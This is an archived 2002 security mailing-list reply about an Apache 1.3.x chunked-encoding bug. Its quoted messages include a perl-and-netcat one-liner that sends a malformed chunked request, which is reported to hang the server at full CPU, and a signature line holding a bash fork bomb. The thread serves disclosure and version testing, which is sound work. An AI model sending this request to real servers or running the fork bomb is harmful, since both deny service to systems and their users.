Re: Re: apache chunked encoding

From: cc (crystalat_private)
Date: Wed Jun 19 2002 - 21:17:20 PDT

  • Next message: Wodahs Latigid: "RE: procmail heap overflow"

    DEAR Edwin Groothuis:
    
    Apache/1.3.23 (Unix)  (Red-Hat/Linux) in my box doesn't show this dehaviour
    
    
                                                                            kiven_chen
    ======= 2002-06-20 12:13:00 IN YOUR E-MAIL£º=======
    
    >On Thu, Jun 20, 2002 at 12:21:47AM +0200, Przemyslaw Frasunek wrote:
    >> I was playing a bit with chunked encoding vulnerability and found the
    >> following. When I send a request to Apache 1.3.24 using malformed
    >> chunked encoding, httpd process goes into infinite loop and CPU load
    >> grows to 100. Example:
    >> 
    >> perl -e 'print "POST http://www/index.html HTTP/1.1\r\nAccept: */*\r\nHost: www\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-length: 5000\r\n\r\n" . "A"x5000 . "\r\n\r\n"' | nc localhost 80
    >> 
    >> 62681 www       63   0   146M  5364K RUN      3:08 45.90 45.90 apache
    >> 42121 www       63   0   139M  2524K RUN      1:15 44.97 44.97 apache
    >> 
    >> Can anyone try it with 1.3.26?
    >
    >Apache 1.3.26 doesn't show this behaviour
    >(yes, I've tried it with 1.3.20 first)
    >
    >Edwin
    >-- 
    >Edwin Groothuis      |           Personal website: http://www.MavEtJu.org
    >edwinat_private    |        Interested in MUDs? Visit Fatal Dimensions:
    >bash$ :(){ :|:&};:   |                    http://www.FatalDimensions.org/
    
    = = = = = = = = = = = = = = = = = = = =
    



    This archive was generated by hypermail 2b30 : Thu Jun 20 2002 - 09:13:20 PDT